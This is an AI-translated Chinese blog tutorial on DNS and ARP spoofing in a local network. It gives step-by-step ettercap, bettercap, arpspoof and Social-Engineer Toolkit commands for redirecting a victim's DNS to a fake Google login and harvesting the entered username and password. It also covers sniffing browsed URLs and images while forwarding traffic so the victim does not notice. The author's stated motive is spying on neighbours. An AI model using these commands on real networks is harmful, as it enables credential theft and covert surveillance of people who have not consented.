banner
肥皂的小屋

肥皂的小屋

github
steam
bilibili
douban
tg_channel
HomeArchivesPortfoliosNftAboutShotrs

Intranet - Detailed Explanation of DNS Spoofing and ARP Spoofing

#内网#DNS#ARP#Kali266
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
This article discusses DNS spoofing and ARP spoofing in internal networks. It explains how attackers can impersonate domain servers to redirect users to their own webpages instead of the intended websites. It also mentions tools like Ettercap, Bettercap, and Cain & Abel for implementing these techniques. The article discusses the use of Kali as the attacking machine and Win7 as the target machine. It provides instructions on performing DNS spoofing attacks using Ettercap and mentions the use of tools like BlackEye and the Social-Engineer Toolkit for phishing attacks. The article also explains how to set up a phishing website using SET and monitor account passwords sent through HTTP requests. It concludes by mentioning the use of Ettercap to redirect traffic for specific domains.

Table of Contents:

  • Cause of the Incident
  • DNS Spoofing
  • Principle
  • Practical Application
  • Using Ettercap for Pranks
  • Using SET + Ettercap for Phishing
  • Bettercap
  • Cain & Abel
  • ARP Spoofing
  • Principle
  • Practical Application
  • arpspoof
  • ettercap
  • bettercap
  • Cain & Abel

Cause of the Incident#

To see what the neighbor girl or brother is watching, or to remind the neighbor to be a bit quieter.

Reference Articles:

#

  • Kali: 192.168.1.107, used for attacking
  • Win7: 192.168.1.106, used for being attacked

Both machines are connected to the internet via a bridged network card.

Tools Used:

  • Ettercap
  • Bettercap
  • arpspoof and driftnet from the Dsniff tool suite

DNS Spoofing#

Principle#

  • What is DNS (Domain Name System)?

The Domain Name System (DNS) is a service on the internet. It acts as a distributed database that maps domain names to IP addresses, making it easier for people to access the internet.

When we visit a domain, such as soapffz.com, the browser requests the DNS server to obtain the corresponding IP address 140.143.2.176 (my server's IP has ping functionality disabled).

  • What is DNS Spoofing?

DNS Spoofing is a deceptive act where an attacker impersonates a domain server. Principle: If one can impersonate a domain server and set the queried IP address to the attacker's IP address, the user will only see the attacker's homepage instead of the desired website's homepage. This is the basic principle of DNS Spoofing. DNS Spoofing does not actually "hack" the target website; it is merely impersonation and deception.

  • Therefore, the DNS hijacking often heard about from ISPs is when the ISP modifies the IP addresses corresponding to URLs in your network's default DNS server, leading to pop-up ads and other phenomena. An effective way to prevent ISP DNS hijacking is to change your DNS server to a public DNS address, such as 114.114.114.114.

For more detailed content on DNS resolution, refer to: Understanding DNS Records and Their Simple Applications in Penetration Testing

So what can we achieve with DNS Spoofing: Pranks or Phishing

Practical Application#

DNS Spoofing can be implemented on Linux using Ettercap (which also involves some ARP Spoofing) and can be combined with SET for phishing, or bettercap can be used.

On Windows, Cain & Abel can be used.

Using Ettercap for Pranks#

First, we use the powerful man-in-the-middle attack tool: Ettercap.

  1. Edit the Ettercap DNS file:
vim /etc/ettercap/etter.dns

If it's a prank and you don't want the other party to access any interface, you can point all URLs to one IP. Here, to serve as a friendly reminder, we will point all IPs to my computer:

image

  1. Start an apache2 service.

Backup the default configuration page: /var/www/html/index.html, then replace its content with your own:

<HTML>

<HEAD>
    <meta http-equiv="content-type" content="txt/html; charset=utf-8" />
    <TITLE>Hello, Big Brother</TITLE>

<BODY>
    <p>Surprised, right?</p>
    <p>I'm just here to say hello</p>
    <p>No malice</p>
    <p>Let's play together sometime</p>
    <p>My website: https://soapffz.com/</p>
</BODY>
</HEAD>

</HTML>

image

Then restart the apache2 service and check if it displays our page:

image

OK, no issues.

  1. Start the spoofing.

We first use the graphical interface: ettercap -G, select Unified sniffing to sniff in a man-in-the-middle manner:

image

Select the corresponding network card, then scan the local area network and open the host list through Host list:

image

Add the gateway to Target 1 and the attack target to Target 2:

image

Next, in Mitm (man-in-the-middle attack), select ARP poisoning:

image

Check remote sniffing link, confirm:

image

In the plugins, select dns_spoof:

image

Double-click, and a * will appear in front, then click Start sniffing to begin our DNS spoofing attack:

image

This way, our attack target will see our custom page whenever they open any webpage:

image

However, this type of attack has drawbacks, such as being unable to spoof HTTPS URLs and easily exposing our IP:

image

We can also operate Ettercap via command line: enable IP forwarding, design the spoofing webpage, etc., which is the same as the graphical interface. But with the command line, you can execute the above complex operations with just one command:

ettercap -TqM ARP:remote -P dns_spoof /192.168.1.1// /192.168.1.107//

Parameter explanation:

  • -i: Specify the network card, usually defaults to eth0
  • -T: Use only text GUI
  • -q: Start quiet mode (no echo)
  • -M: Execute man-in-the-middle attack
  • ARP:remote: Use remote sniffing
  • -P: Specify plugin
  • The two positions after, the first is Target 1, the second is Target 2, both enclosed in / //

image

The above introduces the prank part, so how do we achieve phishing? We just need to set the IP addresses of the websites the victim might visit in the /etc/ettercap/etter.dns file to yours.

Then we also need to write a Google interface or Baidu interface, which seems quite troublesome.

Using SET + Ettercap for Phishing#

Of course, here we only mention Ettercap as an example; there are other powerful phishing tools such as: BlackEye.

Here we introduce the Social Engineering Toolkit: Social-Engineer Toolkit, abbreviated as SET.

It is not the same as the Social Engineering Tools in the Kali application collection:

image

As the name suggests, SET is mainly used for social engineering attacks, including phishing websites, wireless AP attacks, QRCode attacks, etc.

In this experiment, SET is mainly used to set up phishing websites and listen for account passwords sent in HTTP requests.

For other usage methods, refer to the article: Basic Usage Tutorial for Social Engineering Toolkit.

Use the setoolkit command to enter, and from here on, I will be lazy and copy from this article.

 Select from the menu:
   1) Social-Engineering Attacks  // Select 1, Social Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About
   ......
   99) Exit the Social-Engineer Toolkit

First, select the first option in the menu, Social Engineering Attacks.

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors  // Select 2, Website Attacks
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules

Then, select the second option in the menu, Website Attacks.

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method  // Select 3, Credential Harvesting
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method

Select the third option, Credential Harvesting.

1) Web Templates  // Use predefined website templates
2) Site Cloner    // Clone a webpage
3) Custom Import  // Import a website from a specified directory

Here, for convenience, we directly select 1, using the built-in website templates in SET for the experiment.

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.1.107]:

Note that it will use your default IP, which is your first IP:

image

If you are using dual network cards and want to penetrate hosts in other internal network segments, you can press Enter, and after pressing Enter, you will see the prompt:

image

Open a new terminal, edit the /etc/setoolkit/set.config file, and change the network card, and it will be OK:

image

Select 2, using the Google login page as the phishing website:

image

When you see

[*] Harvester is ready, have victim browse to your site.

This line indicates that you can start phishing. At this point, opening our attack machine's IP on the victim's computer will show our phishing Google interface:

image

At the same time, the SET console prints out a request record:

image

However, this is too obvious; who doesn't know that 192.168.* is an internal IP? So we will use it in conjunction with Ettercap:

Add the following content to /etc/ettercap/etter.dns:

google.com       A      192.168.1.107
*.google.com     A      192.168.1.107
www.google.com   PTR    192.168.1.107

image

Then execute Ettercap:

ettercap -TqM ARP -P dns_spoof /192.168.1.106///

The specific parameters have been explained earlier, then have the victim machine access google.com:

image

You can see that it opens our phishing interface, and then we log in:

image

We can see that both our Ettercap and SET have obtained the username and password! Phishing successful.

However, there are the following shortcomings:

  1. The HTTPS situation is not considered; HTTPS access will not be forwarded to the target IP.

  2. After clicking login on the phishing webpage, it should redirect to the normal website homepage instead of remaining on the login page.

BetterCap#

The most well-known man-in-the-middle attack tool is Ettercap, but the purpose of developing Bettercap is not to catch up with it but to replace it for the following reasons:

  • Ettercap is very successful, but it has become outdated in the new era.
  • Ettercap's filters are complex, and the usage threshold is high.
  • The host discovery function is ineffective in large networks.
  • Insufficient optimization, too many useless features for researchers.
  • Insufficient extensibility; development requires mastering C/C++ language.

Bettercap is updated relatively frequently, and the new version adopts a class msf embedded terminal interface, which provides an immersive experience, but there are also some issues, such as mixing input and output and line refresh issues.
The functionality of this version of Bettercap has greatly enriched, transitioning from a simple network analyzer to all "cap" functionalities, supporting previous intranet ARP and DNS spoofing, as well as low-power Bluetooth (BLE), GPS sniffing, and sending remote wake-up signals (Wake On LAN) to devices with specified MAC addresses on the network, making it very powerful.

Download link (with Windows version): https://github.com/bettercap/bettercap/releases/latest

Kali does not come with it: apt-get install bettercap -y

First, let's look at some basic parameters: bettercap -h

image

Parameter explanation:

ParameterMeaning
-autostart stringAutomatically start required modules separated by commas
-caplet stringRead commands from a file and execute them in an interactive session
-cpu-profile fileWrite CPU configuration file.
-debugPrint debug messages.
-env-file stringLoad environment variable file
-eval stringRun one or more commands separated by ; in an interactive session to set variables via command line.
-gateway-override stringUse the provided IP address instead of the default gateway. If not specified or invalid, the default gateway will be used.
-iface stringThe network interface to bind to; if empty, the default interface will be automatically selected.
-mem-profile fileWrite memory configuration file to file.
-no-colorsDisable output color effects.
-no-historyDisable interactive session history file.
-silentSuppress all non-error logs.

Now let's open bettercap and take a look:

image

After opening, it will automatically start detecting hosts in the current subnet. Enter help to see many setting options:

image

The following are parameter explanations:

|:-----:|:-----:|
|help MODULE|If no module name is provided, list available commands or show module-specific help.|
|active|Display information about active modules.|
|quit|Close the session and exit.|
|sleep SECONDS|Sleep for the given number of seconds.|
|get NAME|Get the value of variable NAME, use * alone, or use NAME * as a wildcard.|
|set NAME VALUE|Set variable NAME to VALUE.|
|read VARIABLE PROMPT|Display PROMPT to ask for user input that will be stored in VARIABLE.|
|clear|Clear the screen.|
|include CAPLET|Load and run this caplet in the current session.|
|! COMMAND|Execute a shell command and print its output.|
|alias MAC NAME|Assign an alias to a given endpoint with its MAC address.|

Module Description:

|:-----:|:-----:|
|any.proxy|Redirect firewall to any specified proxy|
|api.rest|RESTful API module|
|arp.spoof|ARP spoofing module|
|ble.recon|Low-power Bluetooth device discovery module|
|caplets|Used to list and update caplets module|
|dhcp6.spoof|DHCP6 spoofing module (modifies the client's DNS server by forging DHCP packets, so it needs to be enabled along with dns.spoof)|
|dns.spoof|Respond to DNS spoofing messages|
|events.stream|This module is enabled by default and is responsible for displaying the time stream during interactive sessions|
|gps||
|http.proxy|HTTP transparent proxy, can use Javascript module|
|http.server|HTTP server|
|https.proxy|HTTPS transparent proxy|
|https.server|HTTPS server|
|mac.changer|Change the MAC address of the active interface|
|mysql.server||
|net.probe|Probe the network by sending UDP data to every possible IP in the subnet|
|net.recon||
|net.sniff|Network sniffing module|
|packet.proxy||
|syn.scan|Perform SYN port scanning |
|tcp.proxy||
|ticker||
|update||
|wifi|WiFi module, with deauth attack (WiFi killer) and the ability to create soft APs|
|wol||

For detailed usage of each module, refer to this article: https://blog.csdn.net/u012570105/article/details/80561778

Bettercap Practical Application

In Bettercap, set the URLs to be spoofed and your malicious server IP:

set dns.spoof.domains *.baidu.com
set dns.spoof.address 1.1.1.1
dns.spoof on

image

Set the DNS server address in Windows 7 to your own IP address:

image

After refreshing DNS, use the ping command (here ping is not working, I have doubts, IPv4 forwarding is enabled):

image

We can see the DNS request information on our Kali side:

image

Cain & Abel#

Cain & Abel is a free password recovery tool developed by Oxid.it for Microsoft operating systems. It is known as the poor man's L0phtcrack. Its functionality is very powerful, capable of network sniffing, network spoofing, cracking encrypted passwords, decoding scrambled passwords, displaying password boxes, showing cached passwords, and analyzing routing protocols, and even listening to VOIP calls made by others in the intranet.

Download link: http://www.oxid.it/cain.html, requires support from winpacp, but the download page for winpacp states: The WinPcap project has ceased development and WinPcap and WinDump are no longer maintained. We recommend using Npcap instead: The WinPcap project has stopped development, and WinPcap and WinDump are no longer maintained. We recommend using Npcap instead.

So we directly download npacp: https://nmap.org/npcap/, the latest version is 0.99-r9, click to download.

When installing, in addition to the default options, check the bottom option: Install Npcap in WinPacp API-compatible Mode to meet Cain & Abel's support requirements for winpacp.

The main interface of Cain & Abel looks like this:

image

Let's take a look at the Tool interface, where the main functionality is still password cracking:

image

ARP Spoofing#

Principle#

ARP

The Address Resolution Protocol (ARP) is a TCP/IP protocol that obtains a physical address based on an IP address. When a host sends information, it broadcasts an ARP request containing the target IP address to all hosts on the network and receives a return message to determine the target's physical address; upon receiving the return message, it stores the IP address and physical address in its ARP cache for a certain period, and the next request directly queries the ARP cache to save resources.

ARP Spoofing

ARP Spoofing, also known as ARP poisoning (often translated as ARP virus online), is an attack technique against the Ethernet Address Resolution Protocol (ARP). By deceiving the gateway MAC address of the PC accessing the network, the visiting PC mistakenly believes that the MAC address changed by the attacker is the gateway's MAC, resulting in network disconnection. This type of attack allows the attacker to capture data packets on the local area network and even modify data packets, and can prevent specific computers or all computers on the network from connecting normally.

Implementation#

The most classic tool for implementing ARP spoofing on Linux is arpspoof (which is relatively stable), and ettercap and bettercap can also be used.

On Windows, you can use:

View the local ARP cache table:

(Common) arp -a: but it executes slowly on Linux.

(Linux) ip neigh show: implemented through another system call netlink.

If ARP spoofing is consistently unsuccessful, you can use arp -d to delete the ARP cache table (requires administrator privileges).

arpspoof#

arpspoof can perform one-way spoofing or two-way spoofing (open two terminals), with general parameters as follows:

arpspoof -i [network card] -t [target host] [host you want to impersonate]

-i specifies the network card, -t specifies the target; if not specified, it will ARP poison the entire subnet.

So here we want to spoof Win7 (192.168.1.106) as the gateway (192.168.1.1), and also want to spoof the gateway as Win7, we can use the following commands:

arpspoof -i eth0 -t 192.168.1.106 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.1.106

First, let's look at Win7's ARP cache table before performing ARP spoofing:

image

Then start the spoofing:

image

Check the ARP cache table again:

image

We find that the original gateway's MAC address has become the same as Kali's. Therefore, all traffic sent to the gateway will pass through Kali, and Kali is also simultaneously deceiving the gateway into thinking it is Win7, so Win7 can surf the internet normally, but it does not know that all traffic is being monitored.

However, it is recommended to enable the Linux kernel's traffic forwarding feature; otherwise, it may cause the other party to lose internet access, raising their suspicion:

sysctl net.ipv4.ip_forward
sysctl -w net.ipv4.ip_forward=1

image

ettercap#

The detailed usage method has been introduced earlier; here is the command directly:

ettercap -i eth0 -TqM ARP /192.168.1.106// ///

image

This achieves the same effect as above.

bettercap#

Similarly, we enter using the bettercap command and execute the following commands:

net.sniff on
set arp.spoof.targets 192.168.1.106
(Setting to target one or more targets; if not set, it will start spoofing the entire subnet)
arp.spoof on

At this point, ARP spoofing has started. If we use packet capture tools like Wireshark to capture, we will find that only TCP packets can be captured, and no HTTP/HTTPS packets can be captured. You can enable HTTP/HTTPS proxy by using the command http.proxy on or https.proxy on.

If you want to open a window to monitor HTTP web browsing, you can use the command urlsnarf -i eth0 (the urlsnarf command should be used after ARP spoofing):

image

Driftnet can be used to filter and sniff images, using driftnet for traffic monitoring to display images browsed by the victim: driftnet -i eth0:

image

Both driftnet and arpspoof belong to the Dsniff tool suite.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.